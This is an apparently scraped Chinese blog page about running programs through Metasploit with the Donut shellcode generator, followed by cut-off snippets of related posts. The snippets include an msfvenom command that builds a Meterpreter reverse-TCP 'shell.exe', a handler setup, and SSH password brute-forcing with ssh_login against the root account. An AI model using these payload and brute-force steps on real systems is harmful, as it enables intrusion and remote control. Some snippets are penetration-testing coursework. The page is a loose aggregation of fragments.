msf+Donut执行程序

地址:donut:https://github.com/TheWover/donut

介绍:是一个shellcode生成工具,可以将.NET程序集等转换为shellcode。

使用:donut.exe -f (指定文件名) -a 2 (系统位数2代表64位) -o (输出文件名)

msf设置参数:

ps:msf若没有此博客自行添加到对应目录:https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/shellcode_inject.rb

添加完成后执行命令:reload_all

参考链接:

https://3gstudent.github.io/3gstudent.github.io/Shellcode%E7%94%9F%E6%88%90%E5%B7%A5%E5%85%B7Donut%E6%B5%8B%E8%AF%95%E5%88%86%E6%9E%90/

原文地址:https://www.cnblogs.com/websecyw/p/12082323.html

时间: 2024-12-16 18:25:40

msf+Donut执行程序的相关文章

Donut和MSF以shellcode注入的方式执行任意文件

准备工具 MSF https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers Donut https://github.com/TheWover/donut 准备的shellcode_inject.rb代码 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.co

【渗透测试】Msf提权步骤

1.生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe 2.MSF接受设置 1 use exploit/multi/handler 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.1

构建之法---MSF

今天看到了第七章看到MSF这个词,确实非常陌生,于是我打开了搜索引擎,百度告诉我"MSF是一套大型系统开发指南,它描述了如何用组队模型.过程模型和应用模型来开发Client/Server结构的应用程序,是在微软的工具和技术的基础上建立并开发分布式企业系统应用的参考." 大约在1933年,微软总结了自己产品团队的开发经验和教训,以及微软咨询服务部门的业务经验后,推出了MSF.当时只是这些经验和教训的初步总结,在之后的几年中,它进一步吸收了微软各部门和微软的合作伙伴在实际项目中的经验. 1

MSF魔鬼训练营-3.3.2 口令猜测与嗅探

密码暴力破解以SSH为例,其他协议方法类似 SSH msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 192.168.3.199 rhosts => 192.168.3.199 msf auxiliary(ssh_login) > set username root username => root msf auxiliary(ssh_login) > set

构建之法学习(第七章 MSF)

第七章 MSF MSF(Microsoft Solution Framework)微软解决方案框架: MSF是一套大型系统开发指南,是微软推荐的软件开发方法,它描述了如何用组队模型.过程模型和应用模型来开发Client/Server结构的应用程序,是在微软的工具和技术的基础上建立并开发分布式企业系统应用的参考. 一.MSF 9条基本原则 1.推动信息共享与沟通 --把所有信息都保留并公开,讨论要包括所有涉及的角色,决定要公开并告知所有人. 当然,对牵涉到技术机密.安全性等信息要采取必要的保护措施

20145234黄斐《网络对抗技术》实验五,MSF基础应用

概述 MSF的六种模块 Exploit模块 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件. 形象点来说就是攻击模块 Payload模块 是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接.实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码. Encoder模块 针对payload进行编码,可以通过多种编码手段.多次编码方式有效的改变payloa

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

软件开发-MSF方法(《构建之法》读书笔记2)

MSF-微软解决方案框架,是一套大型系统开发指南,它描述了如何用组队模型.过程模型和应用模型来开发Client/Server结构的应用程序,是在微软的工具和技术的基础上建立并开发分布式企业系统应用的参考.在现在的软件开发项目中每一个软件开发项目都要经过 一个生命周期.MSF过程模型是从传统的软件开发瀑布模型和螺旋模型发展而来的,它瀑布模型中基于里程碑的规划与螺旋模型中的增量迭代的长处结合起来.MSF作为现在流行的软件开发思路,其有自己的基本原则. MSF基本原则: 1:推动信息共享和沟通 2:为

MSF 离线攻击

MSF 离线攻击 MSF连环攻击在internet上实现是不太现实的,网络中的安全设备(防火墙.入侵检测.入侵防护系统). 实验拓扑如下: 实验说明:安全实验中的包过滤防火墙在测试中使用的是linux iptables,上述拓扑中,攻击者的公网地址为61.67.1.100/24,而防火墙上的公网地址61.67.1.200/24 对内部主机192.168.1.0/24 做SNAT. Linux iptables 策略如下: #bin/bash Fw=/sbin/iptables $fw –P IN